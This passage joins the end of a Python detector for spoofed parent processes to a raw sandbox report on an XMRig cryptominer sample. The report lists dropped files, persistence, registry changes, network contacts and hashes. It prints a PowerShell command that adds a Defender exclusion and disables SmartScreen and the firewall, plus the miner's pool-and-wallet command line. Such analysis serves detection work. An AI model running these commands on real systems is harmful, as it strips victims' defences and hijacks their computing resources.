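    ProcessStart(3000, r"C:\ProgramData\UpSys.exe", 1000, 2500),
    ProcessStart(4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 3000, 3000),
    # The same launch seen through PPID-only telemetry (no caller recorded)
    ProcessStart(5000, r"C:\ProgramData\UpSys.exe", 1000, None),
]


if __name__ == "__main__":
    for f in detect_spoofed_parents(SAMPLE_EVENTS):
        print(f"PID {f.pid} {f.image}: {f.reason}")
```

The first six sample events (a normal boot chain, explorer.exe launching haha.exe, which launches powershell.exe) produce no findings; the re-parented UpSys.exe is caught by both checks, and the PPID-only copy by the heuristic alone. The heuristic will also flag legitimate service-hosted binaries living under ProgramData, so in production it is a hunting query, not an alert on its own.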
xmrig
XMRig Miner Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\79571.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
| N/A | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
| N/A | N/A | C:\ProgramData\UpSys.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\haha.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\exe.lnk | C:\Users\Admin\AppData\Local\Temp\DllHost.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\ProgramData\UpSys.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\ProgramData\UpSys.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\ProgramData\UpSys.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\ProgramData\UpSys.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\ProgramData\UpSys.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Systemd\procexp.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\haha.exe
"C:\Users\Admin\AppData\Local\Temp\haha.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -F C:\Users\Admin\AppData\Local\Temp\79571.ps1
C:\Users\Admin\AppData\Local\Temp\79571.exe
"C:\Users\Admin\AppData\Local\Temp\79571.exe"
C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
"C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe"
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
"C:\Users\Admin\AppData\Local\Temp\DllHost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty –Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System –Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty –Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run –Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
C:\ProgramData\Systemd\procexp.exe
--url pool.hashvault.pro:80 --user 42kFTbPkrpEY8KRSdRjzLpawdNvmR1BTKPRfaaGoq9TcDNhnKapy9G99eH9AsJon766YDYnKEobxycNSDuHbPG3JHV5zKut --pass x
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
C:\ProgramData\UpSys.exe
"C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Network
| Country | Destination | Domain | Proto |
| US | 20.189.173.2:443 | | tcp |
| NL | 104.110.191.133:80 | | tcp |
| NL | 104.110.191.133:80 | | tcp |
| NL | 104.110.191.133:80 | | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| N/A | 127.0.0.1:49754 | | tcp |
| N/A | 127.0.0.1:49759 | | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 3.220.57.224:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | crl.usertrust.com | udp |
| US | 104.18.32.68:80 | crl.usertrust.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 13.107.21.200:443 | | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 142.132.131.248:80 | pool.hashvault.pro | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\79571.ps1
| MD5 | d831df909c8d68d7ac710f09ea9a7294 |
| SHA1 | 4cf51399d9895c799c297e5e3078fa25cf4940b5 |
| SHA256 | 9771d530fb3067031df355268df854d6f162d97074ae8883ffb30b7350cf8f0c |
| SHA512 | 000959c53063ee99db5ec20448a23e6406720c611ed225b7f8ed92855c1c576b2127cb48c6508cb61a00c9ab96fc40bed81a94e5db5ff18db520aacf48ac0e77 |
C:\Users\Admin\AppData\Local\Temp\79571.exe
| MD5 | cb9659a181ad8cc58023c5d8566b2d5a |
| SHA1 | 7b6c751aefca16847c2b1e57712342a7dffe585f |
| SHA256 | d08aeb5728d24a7b12f86c2751382d15572bdebbff06fa083c4a792592074cc2 |
| SHA512 | 6d6bc8815cae73207c0dd9825ce8b8d7b4191a37c05c3bff1ebd5189a4f0db0b84c067126b0050fae34725c5de9cdb8cceb8ec6296be2099a2c12ad93deb7c24 |
C:\Users\Admin\AppData\Local\Temp\build_220706_120246samopis.exe
| MD5 | 77636b47fc9e1bc61a4a019371e09390 |
| SHA1 | 615275ae7a28ee86cd9f4f586a3c7c5366490444 |
| SHA256 | 7fbed14d0d7d52a459fc29bae6a62eedd0a69649049b8f9ac37e1297acc3b277 |
| SHA512 | ea73fe48dc36d0dd2344e3389bb70a7f047a210f08578bdb5ff4e690e3f95fab0412edcb52819234ca28ff0d983fa8646bc1e2e76f1134df937896f115f8c37d |
C:\Users\Admin\AppData\Local\Temp\DllHost.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 0c15ac263e9da0baa9287d105570e6f1 |
| SHA1 | 99aa6487b21dc6e1cd5f4a097313508df50f0829 |
| SHA256 | 40dc53e1f4d85e4c22d6e35799dc25639d1da6e27805c34f6af092b68a8735c3 |
| SHA512 | 2aeef83af972de648d126b8fc347e5142113a842a2280f97435e85c8c0c5700dcf390b2c5afa3f5b868a0c404fc2c47ae73178b666677529ae7b3c63c7f67cac |
C:\ProgramData\UpSys.exe
| MD5 | efe5769e37ba37cf4607cb9918639932 |
| SHA1 | f24ca204af2237a714e8b41d54043da7bbe5393b |
| SHA256 | 5f9dfd9557cf3ca96a4c7f190fc598c10f8871b1313112c9aea45dc8443017a2 |
| SHA512 | 33794a567c3e16582da3c2ac8253b3e61df19c255985277c5a63a84a673ac64899e34e3b1ebb79e027f13d66a0b8800884cdd4d646c7a0abe7967b6316639cf1 |
C:\ProgramData\Systemd\procexp.exe
| MD5 | 2d9fb9ed8bebb55280b81a4652dcfa11 |
| SHA1 | 76300e059e74d8cfc99a736917cd3a512dd32cab |
| SHA256 | 573fc41ae5b597cbb3e2255224013aa861d23b6608b2efef20685ff393e6b8bf |
| SHA512 | ae984a21cbf9c556407ad8ee60c07342884d5905cd0e9aece195ed44cca82d434b24da931be346e1cecea8fca856af6dd3dcd2994f95f5895647fe029650ce9c |
C:\ProgramData\MicrosoftNetwork\System.exe
| MD5 | 6368031626da1f0d51bcac43104b123f |
| SHA1 | 5a340a1a3edc0bf03526e677a0415ffd156c139c |
| SHA256 | 11004aff3ee4083623a7e01cb06438e1b8879e2d00cf2350c26fb1003125577d |
| SHA512 | 442b04dc415858e61555b0f026c6ebb76fcad22f9317736766bb793dbcc22fc014ddb1973feaff05298905bf2e97036aa64ae96fa9cc9884d50015d17fbac465 |